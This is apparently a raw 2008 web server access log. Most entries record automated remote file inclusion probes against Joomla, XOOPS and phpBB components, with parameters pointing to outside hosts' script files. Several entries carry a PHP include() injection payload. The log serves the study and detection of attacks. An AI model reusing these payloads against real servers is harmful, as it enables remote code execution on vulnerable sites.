64.38.43.154 - - [14/Feb/2008:08:38:58 -0800] "GET /index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:08:38:58 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.123.27.136 - - [14/Feb/2008:08:40:54 -0800] "GET /multithumb.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.69.192.133 - - [14/Feb/2008:08:41:28 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.send2thailand.com/image/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.24.106 - - [14/Feb/2008:08:42:18 -0800] "GET /bikes/CreSTOC07/ HTTP/1.0" 200 15280 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.32.58.103 - - [14/Feb/2008:08:43:17 -0800] "GET //components/com_glossary/glossary.php?mosConfig_absolute_path=http://www.algebramovie.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
72.32.58.103 - - [14/Feb/2008:08:43:18 -0800] "GET /logs//components/com_glossary/glossary.php?mosConfig_absolute_path=http://www.algebramovie.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:08:44:33 -0800] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:08:44:33 -0800] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:08:44:33 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:08:44:33 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:08:44:33 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:08:44:33 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.143.196 - - [14/Feb/2008:08:45:17 -0800] "GET /index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
72.55.143.196 - - [14/Feb/2008:08:45:17 -0800] "GET /logs/index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
209.97.199.252 - - [14/Feb/2008:08:45:30 -0800] "GET /logs//components/com_glossary/glossary.php?mosConfig_absolute_path=http://www.algebramovie.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
209.97.199.252 - - [14/Feb/2008:08:45:30 -0800] "GET //components/com_glossary/glossary.php?mosConfig_absolute_path=http://www.algebramovie.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
87.119.200.171 - - [14/Feb/2008:08:47:22 -0800] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.119.200.171 - - [14/Feb/2008:08:47:22 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:08:47:31 -0800] "GET /logs/access_080123.log//modules/TotalCalendar/about.php?inc_dir=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:08:47:38 -0800] "GET /logs/access_080123.log//modules/TotalCalendar/about.php?inc_dir=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.69.192.133 - - [14/Feb/2008:08:48:42 -0800] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://www.send2thailand.com/image/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.69.192.133 - - [14/Feb/2008:08:48:42 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.send2thailand.com/image/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.38.135.73 - - [14/Feb/2008:08:49:20 -0800] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.38.135.73 - - [14/Feb/2008:08:49:21 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.38.135.73 - - [14/Feb/2008:08:49:22 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.119.200.171 - - [14/Feb/2008:08:49:23 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.119.200.171 - - [14/Feb/2008:08:49:23 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.25.186 - - [14/Feb/2008:08:49:41 -0800] "GET /logs/access_080131.log/displayCategory.php?basepath=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.25.186 - - [14/Feb/2008:08:49:41 -0800] "GET /displayCategory.php?basepath=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.25.186 - - [14/Feb/2008:08:49:41 -0800] "GET /logs/displayCategory.php?basepath=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.25.186 - - [14/Feb/2008:08:49:45 -0800] "GET /logs/access_080126.log/displayCategory.php?basepath=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.38.135.73 - - [14/Feb/2008:08:49:46 -0800] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
72.55.143.196 - - [14/Feb/2008:08:50:56 -0800] "GET /htdocs/user.php?xoops_redirect=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
72.55.143.196 - - [14/Feb/2008:08:50:56 -0800] "GET /logs/htdocs/user.php?xoops_redirect=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
82.146.33.210 - - [14/Feb/2008:08:51:34 -0800] "GET /index.php?option=com_jmsitemap&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
82.146.33.210 - - [14/Feb/2008:08:51:34 -0800] "GET /logs/index.php?option=com_jmsitemap&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
81.169.135.181 - - [14/Feb/2008:08:51:47 -0800] "GET /logs/access.log//index.php?option=com_content&task=view&id=27&Itemid=39//?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.135.181 - - [14/Feb/2008:08:51:48 -0800] "GET //index.php?option=com_content&task=view&id=27&Itemid=39//?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.135.181 - - [14/Feb/2008:08:51:48 -0800] "GET /logs//index.php?option=com_content&task=view&id=27&Itemid=39//?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
205.234.222.47 - - [14/Feb/2008:08:51:54 -0800] "GET /index.php?option=com_jmsitemap&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
205.234.222.47 - - [14/Feb/2008:08:51:54 -0800] "GET /logs/index.php?option=com_jmsitemap&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
87.119.200.171 - - [14/Feb/2008:08:53:12 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.119.200.171 - - [14/Feb/2008:08:53:14 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.119.200.171 - - [14/Feb/2008:08:53:40 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.119.200.171 - - [14/Feb/2008:08:53:40 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.119.200.171 - - [14/Feb/2008:08:53:40 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.25.213.172 - - [14/Feb/2008:08:54:17 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://naimaa.com/administrator/templates/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.195.169.18 - - [14/Feb/2008:08:54:52 -0800] "GET //components/com_glossary/glossary.php?mosConfig_absolute_path=http://www.algebramovie.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
207.195.169.18 - - [14/Feb/2008:08:54:56 -0800] "GET /logs//components/com_glossary/glossary.php?mosConfig_absolute_path=http://www.algebramovie.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
87.119.200.171 - - [14/Feb/2008:08:55:06 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.119.200.171 - - [14/Feb/2008:08:55:07 -0800] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.119.200.171 - - [14/Feb/2008:08:55:07 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.119.200.171 - - [14/Feb/2008:08:55:11 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.5 - - [14/Feb/2008:08:55:30 -0800] "GET /logs/access_071230.log/account.php?action=http://www.hoopstar.ru/usr/xml/vi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.5 - - [14/Feb/2008:08:55:30 -0800] "GET /logs/account.php?action=http://www.hoopstar.ru/usr/xml/vi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.165.189.195 - - [14/Feb/2008:08:56:01 -0800] "GET /logs/access_071222.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hotellasamericas.com.co//cache/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.165.189.195 - - [14/Feb/2008:08:56:01 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hotellasamericas.com.co//cache/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.119.200.171 - - [14/Feb/2008:08:56:52 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.119.200.171 - - [14/Feb/2008:08:56:52 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.5 - - [14/Feb/2008:08:57:06 -0800] "GET /logs/access_071222.log/account.php?action=http://www.hoopstar.ru/usr/xml/vi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.119.200.171 - - [14/Feb/2008:08:57:10 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.128.49 - - [14/Feb/2008:08:57:15 -0800] "GET /logs/access_070825.log//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.send2thailand.com/image/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.128.49 - - [14/Feb/2008:08:57:20 -0800] "GET //?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.send2thailand.com/image/mic22.txt?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.128.49 - - [14/Feb/2008:08:57:20 -0800] "GET /logs//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.send2thailand.com/image/mic22.txt?? HTTP/1.1" 200 34548 "-" "libwww-perl/5.808" "www.dmulk.com"
87.119.200.171 - - [14/Feb/2008:08:58:49 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.194.121 - - [14/Feb/2008:08:58:59 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.43.154 - - [14/Feb/2008:08:59:43 -0800] "GET /logs/access_080120.log/index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.43.154 - - [14/Feb/2008:08:59:44 -0800] "GET /logs/index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.135.235 - - [14/Feb/2008:09:00:40 -0800] "GET /logs//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://phpbx.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
74.6.26.160 - - [14/Feb/2008:09:00:46 -0800] "GET /mobileoffice/ HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.25.135.235 - - [14/Feb/2008:09:00:49 -0800] "GET //components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://phpbx.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
87.119.200.171 - - [14/Feb/2008:09:01:07 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.11.181 - - [14/Feb/2008:09:01:20 -0800] "GET /logs/access_080120.log/index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.11.181 - - [14/Feb/2008:09:01:21 -0800] "GET /logs/index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.24.145 - - [14/Feb/2008:09:02:02 -0800] "GET /presto/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.152.41.4 - - [14/Feb/2008:09:02:22 -0800] "GET /logs//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://phpbx.iespana.es/test.txt???? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
203.152.41.4 - - [14/Feb/2008:09:02:25 -0800] "GET //components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://phpbx.iespana.es/test.txt???? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
74.50.8.175 - - [14/Feb/2008:09:05:26 -0800] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.8.175 - - [14/Feb/2008:09:05:26 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.8.175 - - [14/Feb/2008:09:05:26 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.8.175 - - [14/Feb/2008:09:05:42 -0800] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.25.213.172 - - [14/Feb/2008:09:06:34 -0800] "GET /logs/access.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://naimaa.com/administrator/templates/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.25.213.172 - - [14/Feb/2008:09:06:35 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://naimaa.com/administrator/templates/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.24.222 - - [14/Feb/2008:09:07:28 -0800] "GET /mobileoffice/?S=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.140 - - [14/Feb/2008:09:07:55 -0800] "GET /bikes/dteel/2008_01_26/?N=D HTTP/1.0" 200 6600 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.25.19 - - [14/Feb/2008:09:09:15 -0800] "GET /logs/access_070814.log HTTP/1.0" 200 55888 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.38.43.154 - - [14/Feb/2008:09:09:31 -0800] "GET /index.php?option=com_jmsitemap&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.11.181 - - [14/Feb/2008:09:09:41 -0800] "GET /index.php?option=com_jmsitemap&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.38.43.154 - - [14/Feb/2008:09:09:57 -0800] "GET /logs/access_080106.log/index.php?option=com_jmsitemap&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.43.154 - - [14/Feb/2008:09:09:58 -0800] "GET /logs/index.php?option=com_jmsitemap&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.11.181 - - [14/Feb/2008:09:10:11 -0800] "GET /logs/access_080106.log/index.php?option=com_jmsitemap&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.11.181 - - [14/Feb/2008:09:10:12 -0800] "GET /logs/index.php?option=com_jmsitemap&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.47.194.121 - - [14/Feb/2008:09:12:03 -0800] "GET /logs/access_080103.log/akocomments.php?mosConfig_absolute_path=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.194.121 - - [14/Feb/2008:09:12:03 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.143.90 - - [14/Feb/2008:09:12:15 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.icel.edu.mx//mambots/content/mosthumb/thumbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.119.200.171 - - [14/Feb/2008:09:13:30 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.119.200.171 - - [14/Feb/2008:09:13:30 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.119.200.171 - - [14/Feb/2008:09:13:31 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.237.64.193 - - [14/Feb/2008:09:13:37 -0800] "GET /logs/access_080105.log///////////index.php?name=PNphpBB2&file=viewtopic&t=32713//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
218.237.64.193 - - [14/Feb/2008:09:13:37 -0800] "GET ///////////index.php?name=PNphpBB2&file=viewtopic&t=32713//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
218.237.64.193 - - [14/Feb/2008:09:13:38 -0800] "GET /logs///////////index.php?name=PNphpBB2&file=viewtopic&t=32713//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
74.50.8.175 - - [14/Feb/2008:09:14:19 -0800] "GET /logs/access_080103.log//modules/xfsection/modify.php?dir_module=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.8.175 - - [14/Feb/2008:09:14:19 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.8.175 - - [14/Feb/2008:09:14:20 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.8.175 - - [14/Feb/2008:09:14:22 -0800] "GET /logs/access_080122.log//modules/xfsection/modify.php?dir_module=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
